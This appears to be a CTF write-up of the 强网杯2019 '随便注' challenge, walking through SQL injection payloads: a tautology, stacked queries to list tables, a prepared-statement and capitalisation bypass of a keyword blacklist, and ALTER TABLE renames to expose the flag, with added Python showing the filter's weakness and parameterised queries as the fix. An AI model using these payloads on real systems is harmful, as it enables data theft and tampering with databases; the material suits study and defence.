Question 3: [强网杯2019] casual note (随便注)

Challenge URL: https://buuoj.cn/challenges

Problem-solving ideas

Step 1: Open the challenge. There is a single input field, and the challenge description makes it clear that this is a SQL injection challenge.

Step 2: Test the SQL statement

Enter 1' or 1=1 # and every row of the current table is returned.

Step 3: Use stacked injection to list the tables

  1. Enter 1';show tables;# to list all tables. There are two: the words table and the 1919810931114514 table.

  2. Enter 1';desc words;# to view the structure of the words table. It has two columns, id and data.

  3. Enter 1';desc `1919810931114514`;# to view the structure of the 1919810931114514 table. It holds the flag we want.

Step 4: Use select to read the flag

Enter 1';select * from `1919810931114514`;# to read the flag from the table. The request is intercepted, and the interception message shows that keywords such as select and update are filtered.

Step 5: Use a prepared statement (precompilation) to get around the select filter

Enter 1';set @sql = CONCAT('se','lect * from `1919810931114514`;');prepare stmt from @sql;EXECUTE stmt;# to view the flag. Split into its parts, the payload reads:

-1';
set @sql = CONCAT('se','lect * from `1919810931114514`;');
prepare stmt from @sql;
EXECUTE stmt;
#

This is blocked as well.

The error message shows that the strstr function performs the check. strstr is case-sensitive, and the filter only matches the lowercase spellings, so capitalising the first letter of the filtered keywords is enough: 1';Set @sql = CONCAT('se','lect * from `1919810931114514`;');Prepare stmt from @sql;EXECUTE stmt;# runs and returns the flag: flag{89c5d790-b14d-4661-9fdf-4aa4e41188ff}
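As an added illustration of why the uppercase trick gets past the check (example code written for this page, not the challenge's own PHP), the functions below model the filter from the defender's side: blocks_case_sensitive imitates a strstr()-style exact substring match against a lowercase keyword list, and blocks_case_insensitive lowercases the input first. The keyword list is constructed for this example; the writeup only names select and update explicitly. The payloads are the ones from the writeup above.

```python
# Defender-side model of the challenge's keyword check (added example, not the
# challenge's own PHP). The keyword list is constructed for this example; the
# page only names select and update explicitly.
BLOCKED_KEYWORDS = ("select", "update", "delete", "drop", "insert", "set", "prepare")


def blocks_case_sensitive(inject: str) -> bool:
    """strstr()-style check: exact, case-sensitive substring match."""
    return any(kw in inject for kw in BLOCKED_KEYWORDS)


def blocks_case_insensitive(inject: str) -> bool:
    """Same list, but the input is lower-cased first (stristr()-style)."""
    lowered = inject.lower()
    return any(kw in lowered for kw in BLOCKED_KEYWORDS)


# Inputs taken from the writeup above.
LOWERCASE_PAYLOAD = ("1';set @sql = CONCAT('se','lect * from `1919810931114514`;');"
                     "prepare stmt from @sql;EXECUTE stmt;#")
CAPITALISED_PAYLOAD = ("1';Set @sql = CONCAT('se','lect * from `1919810931114514`;');"
                       "Prepare stmt from @sql;EXECUTE stmt;#")
TAUTOLOGY = "1' or 1=1 #"


def filter_report(inject: str) -> dict:
    """Returns what each variant of the filter decides for one input."""
    return {
        "case_sensitive": blocks_case_sensitive(inject),
        "case_insensitive": blocks_case_insensitive(inject),
    }


if __name__ == "__main__":
    for name, payload in [("lowercase", LOWERCASE_PAYLOAD),
                          ("capitalised", CAPITALISED_PAYLOAD),
                          ("tautology", TAUTOLOGY)]:
        print(name, filter_report(payload))
```

The case-sensitive check misses the capitalised payload, the case-insensitive one catches it, but neither sees the split 'se','lect' and neither flags the plain tautology from step 2. That is the practical lesson: a keyword blacklist is a detection heuristic at best, not a fix; the fix is to bind user input as a query parameter and never hand it to a multi-statement execution API.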

Approach two

When inspecting the table structure in step 3, we found that entering 1' or 1=1 # displays everything in the words table, so presumably the default query is hard-coded to read from words. If we rename the 1919810931114514 table to words (and rename its flag column to id so that the default query selects it), entering 1' or 1=1 # will show the flag.

Renaming the table

Principle

Rename a table (here the table user becomes users):
alter table user rename to users;

Rename a column (here the column username becomes name):
alter table users change username name varchar(30);

Concrete payload

1'; alter table words rename to words1;alter table `1919810931114514` rename to words;alter table words change flag id varchar(50);#

Split into its parts, it reads:
1';
alter table words rename to words1;
alter table `1919810931114514` rename to words;
alter table words change flag id varchar(50);
#

Querying the flag

Enter 1' or 1=1 # and the flag is displayed.

Stacked injection principle

Stacked injection, as the name suggests, stacks several statements into one query. The principle is simple: mysqli_multi_query() executes several SQL statements at once, so statements separated by ; are run as a batch.
e.g. select * from users;show databases;
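To make the mechanism and its mitigation concrete, here is an added example (not from the original writeup) that uses Python's sqlite3 as a stand-in for MySQL; the words table with id and data columns is constructed inline. lookup_unsafe concatenates the input into the query the way the challenge does, lookup_safe binds it as a parameter, and stacked_rejected shows that an API which executes one statement at a time refuses a trailing statement instead of running it, which is exactly the property given up by calling a multi-statement API such as mysqli_multi_query() on user input. SQLite uses -- rather than # for line comments, so the sample inputs use --.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the challenge's words table (id, data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE words (id INTEGER, data TEXT)")
    conn.executemany("INSERT INTO words VALUES (?, ?)",
                     [(1, "hello"), (2, "world"), (3, "ctf")])
    return conn


def lookup_unsafe(conn: sqlite3.Connection, inject: str) -> list:
    """String-concatenated query, as in the challenge: the input becomes SQL."""
    sql = f"SELECT id, data FROM words WHERE id = '{inject}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, inject: str) -> list:
    """Parameterised query: the input is bound as a value, never parsed as SQL."""
    return conn.execute("SELECT id, data FROM words WHERE id = ?", (inject,)).fetchall()


def stacked_rejected(conn: sqlite3.Connection, inject: str) -> bool:
    """Single-statement execute(): a stacked ';...' statement is refused, not run.

    Older Python versions raise sqlite3.Warning here, newer ones
    sqlite3.ProgrammingError, so both are caught.
    """
    sql = f"SELECT id, data FROM words WHERE id = '{inject}'"
    try:
        conn.execute(sql)
    except (sqlite3.ProgrammingError, sqlite3.Warning):
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    tautology = "1' or '1'='1"
    stacked = "1'; ALTER TABLE words RENAME TO words1; --"
    print("unsafe, tautology:", lookup_unsafe(db, tautology))   # every row
    print("safe, tautology:  ", lookup_safe(db, tautology))     # no row
    print("safe, id 1:       ", lookup_safe(db, "1"))
    print("stacked refused:  ", stacked_rejected(db, stacked))
```

The stacked input above is the rename from approach two; with a single-statement API it never reaches the database, and with a bound parameter it is just an id value that matches nothing.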


Source: blog.csdn.net/qq_37589805/article/details/115353583